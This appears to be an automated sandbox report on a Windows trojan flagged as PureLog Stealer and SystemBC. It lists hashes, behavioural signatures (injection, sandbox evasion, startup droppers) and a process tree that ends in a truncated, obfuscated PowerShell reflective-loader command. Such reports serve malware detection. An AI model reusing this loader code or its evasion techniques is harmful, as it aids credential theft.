Windows
Analysis Report
vm6XYZzWOd.exe
Overview
General Information
Sample name: | vm6XYZzWOd.exerenamed because original name is a hash value |
Original sample name: | 133fda00a490e613f3a6c511c1c660eb.exe |
Analysis ID: | 1441717 |
MD5: | 133fda00a490e613f3a6c511c1c660eb |
SHA1: | e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9 |
SHA256: | cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169 |
Tags: | 32exetrojan |
Infos: | |
Detection
PureLog Stealer, SystemBC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected SystemBC
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Drops VBS files to the startup folder
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Send many emails (e-Mail Spam)
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to resolve many domain names, but no domain seems valid
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Connects to many different domains
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Executes massive DNS lookups (> 100)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
vm6XYZzWOd.exe (PID: 6772 cmdline:
"C:\Users\ user\Deskt op\vm6XYZz WOd.exe" MD5: 133FDA00A490E613F3A6C511C1C660EB) $77a3a3b4 (PID: 1100 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\$77a3a 3b4" MD5: 133FDA00A490E613F3A6C511C1C660EB) $778e373e (PID: 2944 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\$778e3 73e" MD5: 133FDA00A490E613F3A6C511C1C660EB)
powershell.exe (PID: 3712 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.EXE "f unction Lo cal:UKPEWR GEIPej{Par am([Output Type([Type ])][Parame ter(Positi on=0)][Typ e[]]$diFff PduGehihq, [Parameter (Position= 1)][Type]$ PCksoXTjIn )$dnnozXtG tCr=[AppDo main]::Cur rentDomain .DefineDyn amicAssemb ly((New-Ob ject Refle ction.Asse mblyName(' '+[Char](8 2)+''+[Cha r](101)+'' +[Char](10 2)+''+'l'+ ''+[Char]( 101)+''+[C har](99)+' '+'t'+''+[ Char](101) +'dD'+'e'+ ''+[Char]( 108)+''+[C har](101)+ 'g'+[Char] (97)+''+[C har](116)+ ''+[Char]( 101)+'')), [Reflectio n.Emit.Ass emblyBuild erAccess]: :Run).Defi neDynamicM odule(''+[ Char](73)+ 'n'+[Char] (77)+'e'+' m'+''+'o'+ 'r'+[Char] (121)+''+[ Char](77)+ ''+'o'+''+ 'd'+''+[Ch ar](117)+' '+'l'+''+' e'+'',$Fal se).Define Type(''+'M '+''+'y'+' '+[Char](6 8)+''+'e'+ 'l'+[Char] (101)+''+[ Char](103) +'a'+[Char ](116)+''+ [Char](101 )+''+[Char ](84)+''+[ Char](121) +''+'p'+'' +[Char](10 1)+'','C'+ [Char](108 )+''+'a'+' s'+'s'+''+ ','+'P'+'u '+''+[Char ](98)+''+' l'+''+'i'+ 'c'+[Char] (44)+'S'+' e'+'a'+[Ch ar](108)+' '+[Char](1 01)+'d'+[C har](44)+' '+[Char](6 5)+''+'n'+ ''+'s'+''+ [Char](105 )+''+[Char ](67)+''+[ Char](108) +''+'a'+'' +[Char](11 5)+''+[Cha r](115)+'' +[Char](44 )+'A'+'u'+ ''+[Char]( 116)+''+[C har](111)+ ''+'C'+''+ [Char](108 )+''+[Char ](97)+''+[ Char](115) +''+[Char] (115)+'',[ MulticastD elegate]); $dnnozXtGt Cr.DefineC onstructor ('R'+[Char ](84)+''+[ Char](83)+ ''+[Char]( 112)+''+[C har](101)+ ''+[Char]( 99)+''+'i' +''+[Char] (97)+''+[C har](108)+ ''+'N'+''+ [Char](97) +''+[Char] (109)+''+' e'+','+[Ch ar](72)+'' +'i'+''+[C har](100)+ ''+[Char]( 101)+'By'+ [Char](83) +''+[Char] (105)+''+[ Char](103) +''+[Char] (44)+'Pu'+ [Char](98) +''+[Char] (108)+''+[ Char](105) +''+[Char] (99)+'',[R eflection. CallingCon ventions]: :Standard, $diFffPduG ehihq).Set Implementa tionFlags( ''+'R'+''+ [Char](117 )+''+'n'+' tim'+[Char ](101)+''+ [Char](44) +''+[Char] (77)+''+'a '+''+[Char ](110)+''+ 'a'+''+[Ch ar](103)+' '+[Char](1 01)+''+[Ch ar](100)+' ');$dnnozX tGtCr.Defi neMethod(' '+[Char](7 3)+'n'+[Ch ar](118)+' '+[Char](1 11)+''+[Ch ar](107)+' e','P'+[Ch ar](117)+' '+'b'+'l'+ [Char](105 )+''+[Char ](99)+''+[ Char](44)+ 'H'+[Char] (105)+''+[ Char](100) +''+[Char] (101)+''+[ Char](66)+ 'y'+[Char] (83)+''+[C har](105)+ ''+'g'+''+ ','+''+[Ch ar](78)+'' +'e'+''+[C har](119)+ ''+'S'+''+ [Char](108 )+''+[Char ](111)+'t, '+[Char](8 6)+''+[Cha r](105)+'' +[Char](11 4)+''+[Cha r](116)+'' +[Char](11 7)+''+[Cha r](97)+''+ 'l'+'',$PC ksoXTjIn,$ diFffPduGe hihq).SetI mplementat ionFlags(' '+[Char](8 2)+''+[Cha r](117)+'' +[Char](11 0)+''+[Cha r](116)+'i '+'m'+''+[ Char](101) +','+[Char ](77)+''+[ Char](97)+ 'n'+[Char] (97)+''+[C har](103)+ ''+[Char]( 101)+''+[C